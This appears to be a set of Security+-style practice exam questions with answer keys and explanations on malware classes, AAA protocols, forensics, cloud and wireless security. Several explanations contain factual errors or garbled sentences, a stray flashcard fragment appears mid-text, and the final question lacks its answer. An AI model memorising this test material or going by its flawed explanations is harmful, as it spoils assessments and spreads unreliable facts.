An employee calls IT personnel and states that they received an email with a PDF document to review. After the PDF was opened, the system has not been performing correctly. An IT admin conducted a scan and found a virus. Determine the two classes of viruses the computer most likely has. (Select all that apply.) A. Boot sector B. Macro C. Script D. Non-resident
B and C Both a macro and script virus can use a PDF as a vector. The user stated that a PDF file was recently opened. A macro virus is executed when an application is executed. Executable objects can also be embedded or attached within other file types such as Microsoft Word and Rich Text Format. A script virus typically targets vulnerabilities in an interpreter. Scripts are powerful languages used to automate operating system functions and add interactivity to web pages and are executed by an interpreter rather than self-executing. PDF documents have become a popular vector for script viruses. A boot sector virus is one that attacks the disk boot sector information, the partition table, and sometimes the file system. The virus is contained within a host executable file and runs with the host process. The virus will try to infect other process images on persistent storage and perform other payload actions.
A new cloud-based application will replicate its data on a global scale, but will exclude residents of the European Union. Which concerns should the organization that provides the data to consumers take into consideration? (Select all that apply.) A. General Data Protection Regulations (GDPR) B. Sovereignty C. Data Location D. Roles
B and C Data sovereignty refers to a jurisdiction preventing or restricting processing and storage from taking place on systems that do not physically reside within that jurisdiction. Storage locations might have to be carefully selected to mitigate data sovereignty issues. Most cloud providers allow a choice of data centers for processing and storage. GDPR protections extend to any EU citizen while they are within EU or EEA (European Economic Area) borders. There are important institutional governance roles for oversight and management of information assets within a data life cycle. These roles help to manage and maintain data.
Analyze and select the accurate statements about threats associated with virtualization. (Select all that apply.) A. Virtualizing switches and routers with hypervisors make virtualization more secure. B. VM escaping occurs as a result of malware jumping from one guest OS to another. C. A timing attack occurs by sending multiple usernames to an authentication server to measure the server response times. D. VMs providing front-end, middleware, and back-end servers should remain together to reduce security implications of a VM escaping attack on a host located in the DMZ.
B and C Virtual Machine (VM) escaping refers to malware running on a guest Operating System (OS) jumping to another guest or to the host. A timing attack occurs by sending multiple usernames to an authentication server and measuring the server's response times. Hypervisors are a common target of attacks and become more complex when the network infrastructure, such as switches and routers, is also virtualized. When the network infrastructure is implemented in software, it may not be subject to inspection and troubleshooting by system administrators. VMs providing front-end, middleware, and back-end services should be separated to different physical hosts. This reduces the security implications of a VM escaping attack on a host in the Demilitarized Zone (DMZ).
Analyze and compare iOS and Android operating systems (OS) to accurately differentiate between the two. (Select all that apply.) A. Android releases updates often, while iOS is more sporadically released. B. iOS is limited to Apple products, while Android has multiple hardware vendors. C. Android is an open source OS based on Linux, unlike iOS, which is a closed and proprietary system. D. iOS is more vulnerable to attack due to being a closed source, while Android is more secure with multiple partners working to secure the OS.
B and C iOS is the operating system for Apple's iPhone and iPad tablet. Android is an OS for smartphones and tablets, and is an open source OS. This provides more scope for hardware vendors such as Asus, LG, and Samsung. Android is an open source OS based on Linux. iOS is a closed and proprietary system. Apple makes new versions freely available for iOS, with devices typically updated very quickly. Android offers updates more sporadically, as updates are often dependent on the handset vendor to complete. Android is more vulnerable to attack than iOS. Sporadic updates along with apps being installed from multiple vendors, reduces the security on the devices. iOS is a closed source with frequent updates, providing more security.
Analyze the following scenarios and determine which best simulates the use of a content filter. (Select all that apply.) A. A system has broken down a packet containing malicious content, and erases the suspicious content, before rebuilding the packet. B. A high school student is using the school library to do research for an assignment and cannot access certain websites due to the subject matter. C. A system administrator builds a set of rules based on information found in the source IP address to allow access to an intranet. D. A system administrator blocks access to social media sites after the CEO complains that work performance has decreased due to excessive social media usage at work.
B and D A content filter restricts web use to only authorized sites. Examples of content filter uses can be schools restricting access to only sites that are .edu or to not allow sites that have adult-level content. Another example of a content filter can be the workplace, only allowing sites that are for work purposes. A proxy server works on a store-and-forward model and deconstructs each packet, performs analysis, then rebuilds the packet and forwards it on. A part of this process is removing suspicious content in the process of rebuilding the packet. A system admin configures packet filtering firewalls by specifying a group of rules that define the type of data packet, and the appropriate action to take when the packet matches the rule.
A system compromise prompts the IT department to harden all systems. The technicians look to block communications to potential command and control servers. Which solutions apply to working with egress filtering? (Select all that apply.) A. Mediate the copying of tagged data B. Restrict DNS lookups C. Remove compromised root certificates D. Allow only authorized application ports
B and D A recommended filtering approach would be to restrict DNS lookups to an ISP's DNS services or authorized public resolvers, such as Google's, helps to prevent lookups of malicious hosts. A recommended filtering approach would be to allow only authorized application ports and, if possible, restricting the destination addresses to authorized Internet hosts helps to avoid contact with malicious servers. Data loss prevention (DLP) pertains to protecting sensitive information by mediating the copying of tagged data to restrict it to authorized media and services. If an attacker has managed to install a root certificate on a system, the attacker can make malicious hosts and services seem trusted. Admin must remove suspicious root certificates from the client's cache. This is not an egress filtering solution.
Evaluate the threats and vulnerabilities regarding medical devices and then select accurate statements. (Select all that apply.) A. Medical devices are only those devices located outside of the hospital setting, including defibrillators and insulin pumps. B. Attackers may attempt to gain access in order to kill or injure patients, or hold medical units ransom. C. Medical devices are updated regularly to secure them against vulnerabilities and protect patient safety. D. Many portable devices, such as cardiac monitors and insulin pumps, run on unsupported operating systems.
B and D Attackers may have a goal of injuring or killing patients by tampering with dosage levels or device settings. Many of the control systems for medical devices run on unsupported versions of operating systems, such as Windows XP, because the costs of updating the software to work with newer OS versions is high and disruptive to patient services. Medical devices can be found in the hospital, clinic, and as portal devices such as cardiac monitors, defibrillators, and insulin pumps. Medical devices may have unsecure communications protocols. Many devices run on unsupported systems due to the cost and potential disruptions the update would cause.
In which of these situations might a non-credentialed vulnerability scan be more advantageous than a credentialed scan? (Select all that apply.) A. When active scanning poses no risk to system stability B. External assessments of a network perimeter C. Detection of security setting misconfiguration D. Web application scanning
B and D Non-credentialed scanning is often the most appropriate technique for external assessment of the network perimeter or when performing web application scanning. A non-credentialed scan proceeds by directing test packets at a host without being able to log on to the OS or application. A non-credentialed scan provides a view of what the host exposes to an unprivileged user on the network. A passive scan has the least impact on the network and on hosts but is less likely to identify vulnerabilities comprehensively. Configuration reviews investigate how system misconfigurations make controls less effective or ineffective, such as antivirus software not being updated, or management passwords left configured to the default. Configuration reviews generally require a credentialed scan.
Incident management relies heavily on the efficient allocation of resources. Which of the following factors should an IT manager consider regarding the overall scope of dealing with incidents in general? (Select all that apply.) A. Planning time B. Downtime C. Detection time D. Recovery time
B, C, and D Downtime is a critical factor to consider to the degree to which an incident disrupts business processes. An incident can either degrade (reduce performance) or interrupt (completely stop) the availability of an asset, system, or business process. Detection time is an important consideration requiring that the systems used to search for intrusions are thorough, and the response to detections must be fast. Recovery time must be considered, as some incidents that need to have complex system changes require lengthy remediation. This extended recovery period should trigger heightened alertness for continued or new attacks. Planning time can refer to the expected time for completing a project plan, or a period of time scheduled for an IT team to work together to plan out projects. It is not a consideration for incident remediation efforts.
Both Remote Access Dial-In User Service (RADIUS) and Terminal Access Controller Access-Control System (TACACS+) provide authentication, authorization, and accounting using a separate server (the AAA server). Based on the protocols' authentication processes, select the true statements. (Select all that apply.) A. TACACS+ is open source and RADIUS is a proprietary protocol from Cisco. B. RADIUS uses UDP and TACACS+ uses TCP. C. TACACS+ encrypts the whole packet (except the header) and RADIUS only encrypts the password. D. RADIUS is primarily used for network access and TACACS+ is primarily used for device administration.
B, C, and D RADIUS uses TCP or UDP by default over ports 1812 and 1813 and TACACS+ uses TCP on port 49. TACACS+ encrypts the whole packet (except the header, which identifies the packet as TACACS+ data) and RADIUS only encrypts the password portion of the packet using MD5. RADIUS is primarily used for network access for a remote user and TACACS+ is primarily used for device administration. TACACS+ provides centralized control for administrators to manage routers, switches, and firewall appliances, as well as user privileges. RADIUS is an open-source protocol, not TACACS+. TACACS+ is a Cisco proprietary protocol.
Which statement best explains the differences between black box, white box, and gray box attack profiles used in penetration testing? A. A black box pen tester acts as a privileged insider and must perform no reconnaissance. A white box pen tester has no access, and reconnaissance is necessary. A gray box actor is a third-party actor who mediates between a black box and white box pen tester. B. A black box pen tester acts as the adversary in the test, while the white box pen tester acts in a defensive role. A gray box pen tester is a third-party actor who mediates between a black box pen tester and a white box pen tester. C. In a black box pen test, the contractor receives no privileged information, so they must perform reconnaissance. In contrast, a white box pen tester has complete access and skips reconnaissance. A gray box tester has some, but not all information, and requires partial reconnaissance. D. In a white box pen test, the contractor receives no privileged information, so they must perform reconnaissance. In contrast, a black box pen tester has complete access and skips reconnaissance. A gray box tester has some, but not all information, and requires partial reconnaissance.
C A black box penetration tester receives no privileged information, while a white box tester has complete access. A white box test may follow up on a black box test. In a black box pen test, the consultant receives no privileged information about the network and its security systems. A gray box pen tester has partial access and must perform some reconnaissance. A red team performs an offensive role to try to infiltrate the target. A blue team defends a target system by operating monitoring and alerting controls to detect and prevent the infiltration. White box tests are useful for simulating the behavior of a privileged insider threat. Gray box tests are useful for simulating the behavior of an unprivileged insider threat.
Analyze and determine the role responsible for managing the system where data assets are stored, and is responsible for enforcing access control, encryption, and backup measures. A. Data owner B. Data steward C. Data custodian D. Privacy officer
C A data custodian is responsible for managing the system where data assets are stored, including responsibility for enforcing access control, encryption, and backup or recovery measures. A data owner has the ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. The data steward is primarily responsible for data quality, such as ensuring data is labeled and identified with appropriate metadata. The privacy officer is responsible for oversight of any Personally Identifiable Information (PII) assets managed by the company and ensures that the processing and disclosure of PII comply with the legal and regulatory frameworks.
A security expert needs to review systems information to conclude what may have occurred during a breach. The expert reviews NetFlow data. What samples does the expert review? A. Protocol usage and endpoint activity B. Traffic statistics at any layer of the OSI model C. Statistics about network traffic D. Bandwidth usage and comparative baselines.
C A flow collector is a means of recording metadata and statistics about network traffic rather than recording each frame. Network traffic and flow data may come from a wide variety of sources. A SIEM collects data from sensors. The information captured from network packets can be aggregated and summarized to show overall protocol usage and endpoint activity. sFlow, developed by HP and subsequently adopted as a web standard, uses sampling to measure traffic statistics at any layer of the OSI model for a wide range of protocol types. If one has reliable baselines for comparison, bandwidth usage can be a key indicator of suspicious behavior. Unexpected bandwidth consumption could be evidence of a data exfiltration attack.
A system breach occurs at a retail distribution center. Data from a persistent disk is required as evidence. No write blocker technology is available. Which approach does a security analyst use to acquire the disk? A. Carving B. Cache C. Snapshot D. Artifact
C A snapshot is a live acquisition image of a persistent disk. It may have less validity than an image taken from a device using a write blocker technology. Fragments on a disk might represent deleted or overwritten files. The process of recovering them is carving. Cache can refer either to hardware components or software. The system uses a software-based cache in the file system, and when needed, the admin can acquire it as part of a disk image. Artifacts refer to any type of data that is not part of the mainstream data structures of an operating system.
An attacker tricks a host within a subnet into routing through an attacker's machine, rather than the legitimate default gateway, allowing the attacker to eavesdrop on communications and perform a Man-in-the-Middle (MitM) attack. Compare the types of routing vulnerabilities and conclude what the attacker is exploiting in this scenario. A. Route injection B. Denial of service C. ARP poisoning D. Source routing
C ARP poisoning occurs by tricking hosts on the subnet into routing through the attacker's machine rather than the legitimate default gateway. This allows the attacker to eavesdrop on communications and perform replay or MitM attacks. Route injection occurs when routing protocols have weak or no authentication. This can mean traffic misdirected to a monitoring port, sent to a black hole, or continuously looped. Denial of service is redirecting traffic to routing loops or black holes, or overloading the router. Source routing uses an option in the IP header to pre-determine the route a packet will take through the network that it must pass through.
A system analyst is tasked with searching the dark web for harvested customer data. Because these sites cannot be found in a standard website search, what must the analyst have in order to search for the harvested information? A. The Onion Router (TOR) B. Dark web search engine C. Dark Website URL D. Open Source Intelligence (OSINT)
C Access to deep web sites, especially those hidden from search engines, are accessed via the website's URL. These are often only available via "word of mouth" bulletin boards. The Onion Router (TOR) is software used to establish a network overlay to the Internet infrastructure to create the dark net. TOR, along with other software like Freenet or I2P, anonymizes the usage of the dark net. A dark web search engine can be used to find dark web website collections, which constitute roughly 1% of the deep web. Some dark web websites have hidden IP addresses and cannot be found by search engines or require additional software to gain access to the site. Open-source intelligence (OSINT) is cybersecurity-relevant information harvested from public websites and data records.
Evaluate the Agile paradigm within a Software Development Lifecycle (SDLC) to determine which statement demonstrates the idea of continuous tasks. A. Devising an application's initial scope and vision for the project B. Prioritizing the requirements and work through the cycles of designing, developing, and testing C. Releasing well-tested code in smaller blocks D. Perform the final integration and testing of the solution
C Agile development flips the waterfall model by iterating through phases concurrently on smaller modules of code. In this model, development and provisioning tasks are conceived as continuous. The concept phase includes devising the initial scope and vision for the project and to determine its feasibility. The iteration phase consists of prioritizing requirements and working through cycles of designing, developing, testing, and test deploying solutions to the project goals. The transition phase includes performing the final integration and testing of the solution and preparing for deployment in the user environment.
Digital certificates are based on the X.509 standard that defines the fields (or information) about a subject (or entity using the certificate) and the certificate's issuer. Which of the following fields would not be included in a standard public certificate? A. Extensions B. Public key C. Endorsement key D. Subject
C An endorsement key is not required for a digital certificate. It is part of a Trusted Platform Module (TPM) and used to create subkeys for key storage, signature, and encryption operations. The Extensions field defines which extended attributes a certificate supports. V3 certificates can be defined with extended attributes, such as friendly subject or issuer names, contact email addresses, and intended key usage. The Public key field denotes the public key and algorithm used by the certificate holder. This key is distributed to the public to initiate a secure connection with a website or remote server. The Subject field names the certificate holder, expressed as a distinguished name (DN). Within this, the common name (CN) usually matches either the fully qualified domain name (FQDN) of a server or a user email address.
A threat actor programs an attack designed to invalidate memory locations to crash target systems. Which statement best describes the nature of this attack? A. The attacker created a null pointer file to conduct a dereferencing attack. B. The attacker programmed a dereferencing attack. C. The attacker programmed a null pointer dereferencing exception. D. The attacker created a race condition to perform a null pointer dereferencing attack.
C Dereferencing occurs when a pointer variable stores a memory location, which is attempting to read or write that memory address via the pointer. If the memory location is invalid or null, this creates a null pointer dereference type of exception and the process may crash. Dereferencing does not mean deleting or removing; it means read or resolve. A null pointer might allow a threat actor to run arbitrary code. Programmers can use logic statements to test that a pointer is not null before trying to use it. A race condition is one means of engineering a null pointer dereference exception. Race conditions occur when processes depend on timing and order, and those events fail to execute in the order and timing intended.
An engineer looks to implement security measures by following the five functions in the National Institute of Standards and Technology (NIST) Cybersecurity Framework. When documenting the "detect" function, what does the engineer focus on? A. Evaluate risks and threats B. Install, operate, and decommission assets C. Ongoing proactive monitoring D. Restoration of systems and data
C Detect refers to performing ongoing proactive monitoring to ensure that controls are effective and capable of protecting against new types of threats. Identify covers developing security policies and capabilities, and evaluating risks, threats, and vulnerabilities and recommend security controls to mitigate them. Protect and procure covers the processes to install, operate, and decommission IT hardware and software assets with security as an embedded requirement of every stage of an operations life cycle. Recovery deals with the implementation of cybersecurity resilience to restore systems and data if other controls are unable to prevent attacks.
The first responder to a security incident decides the issue requires escalation. Consider the following and select the scenario that best describes escalation in this issue. A. The first responder calls the company's legal team. B. The first responder shuts down the affected system. C. The first responder calls senior staff to get them involved. D. The first responder reviews user privileges to look for users who may have gained unauthorized privileges.
C Escalation is the process of involving additional senior staff to assist in incident management when the first responder feels the situation is too complex to manage alone. "Pulling the plug" on an affected system is an option to contain an attack, but it is not the definition of escalation. Although it is important to have access to legal expertise, who can evaluate the incident response from the perspective of compliance with laws and industry regulations, contacting the legal department is not an example of escalation. The term escalation can describe when a user gains additional privileges without authorization. However, this is within the context of privilege management, not incident response.
Evaluate the following controls that have been set by a system administrator for an online retailer. Determine which statement demonstrates the identification control within the Identity and Access Management (IAM) system. A. A control is set to force a customer to log into their account prior to reviewing and editing orders. B. A control is set to cancel automatic shipments for any customer that has an expired credit card on file. C. A control is set to ensure that billing and primary delivery addresses are valid. D. A control is set to record the date, time, IP address, customer account number, and order details for each order.
C Identification controls are set to ensure that customers are legitimate. An example is to ensure that billing and primary delivery addresses are real and valid. Authentication controls are to ensure that customers have unique accounts, and that only they can manage their orders and billing information. An example is to require each customer create an account prior to allowing them to store billing or shipping information. Authorization controls are to ensure customers can only place orders when they have valid payment information in place prior to completing an order. Accounting controls include maintaining a record of each action taken by a customer to ensure that they cannot deny placing an order. Records may include order details, date, time, and IP address information.
A company determines the mean amount of time to replace or recover a system. What has the company calculated? A. MTBF B. KPI C. MTTR D. MTTF
C Mean Time to Repair (MTTR) is a measure of the time taken to correct a fault to restore the system to full operation. This is also known as a mean time to replace or recover and is important in determining the overall Recovery Time Objective (RTO). The Mean Time Between Failures (MTBF) represents the expected lifetime of a product and is for items that are repairable, such as a server. Key Performance Indicators (KPI) determines the reliability of each asset. Main KPIs include MTBF and MTTR. Mean Time to Failure (MTTF) represents the expected lifetime of a product and is for assets that are not repairable such as a hard drive.
Which of the following considerations is most important when employing a signature-based intrusion detection system? A. The system may produce false positives and block legitimate activity. B. The system must create a valid baseline signature of normal activity. C. Signatures and rules must be kept up to date to protect against emerging threats. D. Signatures and rules must be able to detect zero-day attacks.
C Network behavior and anomaly detection (NBAD) engines use heuristics to generate a statistical model of baseline normal traffic. The system generates false positives and false negatives until, over time, it improves its statistical model of normal activity. A false positive is where legitimate behavior generates an alert. Behavioral-based detection engines are trained to recognize baseline "normal" traffic or events. Anything that deviates from this baseline generates an incident. The signatures and rules (often called plug-ins or feeds) powering intrusion detection need updating regularly to provide protection against the latest threat types. Behavioral-based detection software attempts to identify zero-day attacks, insider threats, and other malicious activity, for which there is a single signature that deviates from the baseline.
A security engineer encrypted traffic between a client and a server. Which security protocol is the best for the engineer to configure if an ephemeral key agreement is used? A. AES 256 B. TLS 1.2 C. TLS 1.3 D. SHA 384
C Only ephemeral key agreement is supported in TLS 1.3. The signature type is supplied in the certificate, so the cipher suite only lists the bulk encryption key strength and mode of operation (AES_256_GCM), plus the cryptographic hash algorithm (SHA384). Prior to TLS 1.3, Elliptic Curve Diffie-Hellman Ephemeral mode for session key agreement, RSA signatures, 128-bit AES-GCM (Galois Counter Mode) for symmetric bulk encryption, and 256-bit SHA for HMAC functions can be used. AES 256 refers to a mode of operation used by TLS to encrypt data that is communicated between systems. SHA 384 refers to a cryptographic hashing algorithm that is used for encryption by protocols such as TLS.
Which statement best describes the difference between session affinity and session persistence? A. With persistence, once a client device establishes a connection, it remains with the node that first accepted its request, while an application-layer load balancer uses session affinity to keep a client connected by setting up a cookie. B. Session affinity makes node scheduling decisions based on health checks and processes incoming requests based on each node's load. Session persistence makes scheduling decisions on a first in, first out (FIFO) basis. C. With session affinity, when a client establishes a session, it remains with the node that first accepted its request, while an application-layer load balancer uses persistence to keep a client connected by setting up a cookie. D. Session persistence makes scheduling decisions based on traffic priority and bandwidth considerations, while session affinity makes scheduling decisions based on which node is available next.
C Session affinity is a layer 4 approach to handling user sessions. When a client establishes a session, it stays with the node that first accepted the request. Most network appliances process packets on a best effort and FIFO basis. Layer 4 load balancers only make basic connectivity tests, while layer 7 appliances can test the application's state. An application-layer load balancer uses persistence to keep a client connected to a session. Persistence typically works by setting a cookie, which can be more reliable than session affinity. Quality of Service (QoS) prioritizes traffic based on its characteristics, like bandwidth requirements for video and voice applications. A round robin is a simple form of scheduling that picks the next node.
A web administrator visits a website after installing its certificate to test the SSL binding. The administrator's client computer did not trust the website's certificate. The administrator views the website's certificate from the browser to determine which certificate authority (CA) generated the certificate. Which certificate field would assist with the troubleshooting process? A. Subject alternative name B. Signature algorithm C. Issuer D. Subject
C The Issuer field provides the name of the certificate authority (CA) that generated and issued the certificate for the web server. The subject alternative name (SAN) displays the extension field to identify the domain name system (DNS) name or names by which a host is identified. The Signature algorithm field displays the algorithm used by the certificate authority to sign the certificate. The Subject field displays the name of the certificate holder, expressed as a distinguished name (DN). The common name (CN) in this part would match the fully qualified domain name (FQDN) of the server or a user email address.
Windows has several service account types, typically used to run processes and background services. Which of the following statements about service accounts is FALSE? A. The Network service account and the Local service account have the same privileges as the standard user account. B. Any process created using the system account will have full privileges over the local computer. C. The local service account creates the host processes and starts Windows before the user logs on. D. The Local Service account can only access network resources as an anonymous user.
C The System account, not the Local Service account, creates the host processes that start Windows before the user logs on. The Network Service account and the Local Service account have the same privileges as the standard user account. Standard users have limited privileges, typically with access to run programs, create, and modify files only belonging to their profile. Any process created using the System account will have full privileges over the local computer. The System account has the most privileges of any Windows account. The Local Service account can only access network resources as an anonymous user, unlike a Network Service account. Network Service accounts can present the computer's account credentials when accessing network resources.
A Department of Defense (DoD) security team identifies a data breach in progress, based on some anomalous log entries, and take steps to remedy the breach and harden their systems. When they resolve the breach, they want to publish the cyber threat intelligence (CTI) securely, using standardized language for other government agencies to use. The team will transmit threat data feed via which protocol? A. Structured Threat Information eXpression (STIX) B. Automated Indicator Sharing (AIS) C. Trusted Automated eXchange of Indicator Information (TAXII) D. A code repository protocol
C The TAXII protocol provides a means for transmitting CTI data between servers and clients. Subscribers to the CTI service obtain updates to the data to load into analysis tools over TAXII. While STIX provides the syntax for describing CTI, the TAXII protocol transmits CTI data between servers and clients. The Department of Homeland Security's (DHS) Automated Indicator Sharing (AIS) is especially aimed at Information Sharing and Analysis Centers (ISACs), but private companies can join too. AIS is based on the STIX and TAXII standards and protocols. A file/code repository holds signatures of known malware code.
A network administrator regularly reviews group membership and access control lists for each resource. The administrator also looks for unnecessary accounts to disable. What is the administrator executing in this situation? A. Recertification B. Logging C. Permission auditing D. Usage auditing
C The administrator is permission auditing, involving the regular review of privileges such as group membership, access control lists for each resource plus identifying, and disabling unnecessary accounts. Recertification is a security control where admin audits user access privileges to ensure they are accurate and adhere to relevant standards and regulations. A resource or user change triggers recertification. Logging is an automated process of capturing data to provide information on the use of the website, alerts of any unusual or suspicious behavior, and audit changes made to pages and settings. Usage auditing means configuring the security log to record key indicators, then reviewing the logs for suspicious activity. This process does not involve reviewing user privileges.
A systems administrator configures several subnets within a virtual private cloud (VPC). The VPC has an Internet gateway attached to it, however, the subnets remain private. What does the administrator do to make the subnets accessible by the public? A. Configure any VPC endpoints. B. Create a VPN between VPCs. C. Configure a default route for each subnet. D. Create a VPC for each subnet.
C The administrator must configure the Internet gateway as the default route for each public subnet. If the admin does not configure a default route, the subnet remains private, even if the VPC has an Internet gateway attached to it. Connections to other services such as storage or services running in other VPCs are possible with VPC endpoint configurations. While VPCs remain private from each other, the admin can create a CSP-managed feature or a VPN, to connect the VPCs and VPNs. Multiple VPCs are not required. A VPC is an isolated virtual cloud that can contain many subnets.
An employee has arrived to work and logged into the network with their smart card. This employee now has access to the company databases, email, and shared network resources. Evaluate all of the basic authorization policies and determine the policy best illustrated in this scenario. A. Least privilege B. Implicit deny C. Single Sign-On (SSO) D. Access key
C This company is using a Single Sign-On (SSO) policy. This means that a user only has to authenticate to a system once, to gain access to all the resources to which the system has granted rights to the user. An example is when a user authenticates with Windows, and also authenticates with the Windows domain's SQL Server, and Exchange Server services. Least privilege means that the system grants rights necessary for users to perform their job and no more. Implicit deny is the foundation of a system's access control. This means that unless there is a rule specifying that a system grants access to a user, the system will deny any access request. The system generates an access key for a user when the user supplies authentication data. The system compares it with the server's security database, and both must match. The server security service generates the access key.
A systems engineer reviews recent backups for a production server. While doing so, the engineer discovers that archive bits on files are clearing and incorrect backup types have been occurring. Which backup type did the engineer intend to use if the bit should not be cleared? A. Snapshot B. Full C. Differential D. Incremental
C With a differential backup, all new and modified files since the last full backup are part of the backup set. With a differential backup type, the archive bit on a file is set to not cleared. A full backup includes all selected data regardless of when the previous backup occurred. With a full backup type, the archive bit on a file is set to cleared. Snapshots are a means of getting around the problem of open files when performing a backup. Snapshots use a copy of the data rather than the live data. With an incremental type backup, new files, as well as files modified since the last backup are part of the backup set. With an incremental backup type, the archive bit on a file is set to cleared.
Which of the following is an example of the process of identifying and de-duplicating files and metadata to be stored for evidence in a trial? A. Legal hold B. Forensics C. eDiscovery D. Due process
C eDiscovery is a means of filtering the relevant evidence produced from all the data gathered by a forensic examination and storing it in a database in a format to use as evidence in a trial. Legal hold refers to the fact that information that may be relevant to a court case must be preserved. Forensics is the practice of collecting evidence from computer systems to an accepted standard in a court of law. Due process is a term used in common law to require that people only be convicted of crimes following the fair application of the laws of the land.
Choose which of the following items classify as Personally Identifiable Information. (Select all that apply.) A. Job position B. Gender C. Full name D. Date of birth
C and D A full name can be used to identify, contact, or locate an individual. A full name is an identifier and can be used to search for a person to locate more PII that can be used to contact or locate a person. A date of birth can be used to identify, contact, or locate an individual. This information is often used when verifying identity and may be used by an attacker to obtain unauthorized access into accounts and obtain other PII. A job position is not considered PII. The position is not considered a person and is typically categorized as public information. Having the sole information of the name of a job position does not arm an attacker with the ability to identify, contact, or locate an individual. Gender is not considered PII and is not unique to an individual. This information will not assist an attacker with contacting, identifying, or locating an individual.
A malicious party adds malware to a popular video game and offers free copies to users. The party's objective is to require the CD to be inserted during use. This software will gain administrative rights, change system files, and may hide from detection without the knowledge or consent of the user. Consider the malware characteristics and determine which may be used. (Select all that apply) A. Spyware B. Keylogger C. Rootkit D. Trojan
C and D A rootkit is characterized by its ability to hide itself by changing core system files and programming interfaces and to escalate privileges. The gaming company accomplished this. Trojans cannot conceal their presence entirely and will surface as a running process or service. While a rootkit is a type of Trojan, it differs in its ability to hide itself. Spyware monitors user activity and may be installed with or without the user's knowledge, but it cannot gain administrative privileges or hide itself. A keylogger is also a type of spyware that records a user's keystrokes. It occurs without a user's knowledge, but it cannot hide itself or gain privileges.
A security professional is looking to harden systems at an industrial facility. In particular, the security specialist needs to secure an HVAC system that is part of an IoT network. Which areas does the specialist look to secure from data exfiltration exploits? (Select all that apply.) A. Edge devices B. Data center C. Fog node D. Edge gateway
C and D A security specialist can incorporate fog nodes as a data processing layer positioned close to edge gateways, assisting the prioritization of critical data transmission. Fog nodes are high-value targets for both denial of service and data exfiltration attacks. Edge gateways perform some pre-processing of data to and from edge devices to enable prioritization. They also perform the wired or wireless connectivity to transfer data to and from the storage and processing networks. Edge gateways are high-value targets to exploit. Edge devices collect and depend upon data for their operation. In this case it would help to harden the HVAC devices or route to HVAC devices. The cloud or data center provides the main storage and processing resources, plus distribution and aggregation of data. The IOT network is typically segmented from the main data center.
DC
Domain Component
Analyze the features of a Full Disk Encryption (FDE) to select the statements that accurately reflect this type of security. (Select all that apply.) A. FDE encrypts the files that are listed as critical with one encryption key. B. The encryption key that is used for FDE can only be stored in a TPM on the disk for security. C. A drawback of FDE is the cryptographic operations performed by the OS reduces performance. D. FDE requires the secure storage of the key used to encrypt the drive contents.
C and D FDE means that the entire contents of the drive, including system files and folders, are encrypted. The cryptographic operations performed by the OS reduces performance. FDE normally utilizes a Trusted Platform Module (TPM) to secure the storage of the key used to encrypt the drive contents. FDE means that the entire content of the drive (or volume), including system files and folders, are encrypted. This is not limited to only critical files. FDE requires secure storage of the key used to encrypt the drive contents. Normally, this is in a TPM. It is also possible to use a removable USB drive if USB is a boot device option.
Analyze the available detection techniques and determine which are useful in identifying a rogue system through software management. (Select all that apply.) A. Visual inspection of ports and switches will prevent rogue devices from accessing the network. B. Network mapping is an easy way to reveal the use of unauthorized protocols on the network or unusual traffic volume. C. Intrusion detection and NAC are security suites and appliances that combine automated network scanning with defense and remediation suites to prevent rogue devices from accessing the network. D. Wireless monitoring can reveal whether there are unauthorized access points.
C and D Intrusion detection and NAC are security suites and appliances that can combine automated network scanning with defense and remediation suites to prevent rogue devices from accessing the network. Wireless monitoring can reveal the presence of unauthorized or malicious access points and stations. Visual inspection of ports/switches will reveal any obvious unauthorized devices or appliances; however, a sophisticated attack can prevent observation, such as creating fake asset tags. Network mapping can identify hosts unless an OS is actively trying to remain unobserved by not operating when scans are running. Identifying a rogue host on a large network from a scan may still be difficult.
A system administrator is setting up a new Simple Mail Transfer Protocol (SMTP) configuration. Make recommendations for how the administrator should configure the ports. (Select all that apply.) A. Port 110 should be used by mail clients to submit messages for delivery. B. Port 143 should be used to connect clients. C. Port 25 should be used for message relay. D. Port 465 should be used for message submission over implicit TLS.
C and D Port 25 is used for message relay between Simple Mail Transfer Protocol (SMTP) servers or Message Transfer Agents (MTA). If security is required and supported by both servers, the STARTTLS command can be used to set up the secure connection. Port 465 is used by providers and mail clients for message submission over implicit Transport Layer Security (TLS). Port 587, versus 110, is used by mail clients (Message Submission Agents) to submit messages for delivery by an SMTP server. Port 143 is used by Internet Message Access Protocol (IMAP) to connect clients. IMAP supports permanent connections to a server and connecting multiple clients to the same mailbox simultaneously.
An engineer creates a new virtualized cloud server with no security settings. What actions are typically recommended to secure such a resource? (Select all that apply.) A. Ensure virtual machines are logging all events for auditing. B. Enforce the principle of most privilege for access to VMs. C. Ensure software and hosts are patched regularly. D. Configure devices to support isolated communications.
C and D Virtual Machine (VM) software, hosts and guest Operating Systems (OS) should be patched on regular intervals. Regular patching provides fixes for identified vulnerabilities. Virtual networking devices should be configured to support isolated communications wherever necessary. This will allow communications with the necessary clients. Virtual machines should log all critical events versus all events. Logging all events will be counterproductive as critical events could be missed due to too much data. The principle of least privilege for access to virtual machines should be utilized for security purposes. Most privilege would not maximize security for virtualized or cloud-based resources.
A company is reviewing the options for installing a new wireless network. They have requested recommendations for utilizing WEP, WPA, or WPA2. Differentiate between Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). Determine which of the following statements accurately distinguishes between the options. (Select all that apply.) A. WEP and WPA use RC4 with a Temporal Key Integrity Protocol (TKIP), while WPA2 uses a 24-bit Initialization Vector (IV). WPA2 combines the 24-bit IV with an Advanced Encryption Standard (AES) to add security. B. WEP is the strongest encryption scheme, followed by WPA2, then WPA. WEP is difficult to crack when protected by a strong password, or if deploying enterprise authentication. WPA2 is more vulnerable to decryption due to replay attack possibilities. C. WPA and WEP use RC4, while WEP uses a 24-bit Initialization Vector (IV). WPA uses a Temporal Key Integrity Protocol (TKIP), and WPA2 uses an Advanced Encryption Standard (AES) for encryption. D. WPA2 is the strongest encryption scheme, followed by WPA, then WEP. WPA2 is difficult to crack if protected by a strong password, or if deploying enterprise authentication. WEP is more vulnerable to decryption due to replay attack possibilities.
